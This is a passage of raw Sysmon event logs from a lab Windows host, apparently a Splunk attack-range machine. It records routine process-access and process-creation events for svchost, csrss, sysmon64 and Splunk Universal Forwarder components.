09:16:26.954{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979760Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.954{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979759Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.954{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979758Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.954{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979757Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.954{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979756Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.954{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979755Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.954{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979754Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.954{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979753Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.954{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979752Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.954{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8BEA-6151-E579-00000000FD01}1240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979751Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.954{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8BEA-6151-E579-00000000FD01}1240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979750Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.939{69CF5F33-8BEA-6151-E579-00000000FD01}1240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979749Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.797{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54F57BEA822FDD01EB36A4D83564CBB4,SHA256=EE8B33FE4FF2B736B8971DFF7CDD63A1CE046AF0FAC79636FBE1F7A41D783C06,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979748Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.563{69CF5F33-8BEA-6151-E479-00000000FD01}35401980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979747Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.407{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8BEA-6151-E479-00000000FD01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979746Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.391{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979745Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.391{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979744Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.391{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979743Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.391{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979742Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.391{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979741Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.391{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979740Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.391{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979739Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.391{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979738Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.391{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979737Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.391{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8BEA-6151-E479-00000000FD01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979736Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.391{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8BEA-6151-E479-00000000FD01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979735Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.376{69CF5F33-8BEA-6151-E479-00000000FD01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 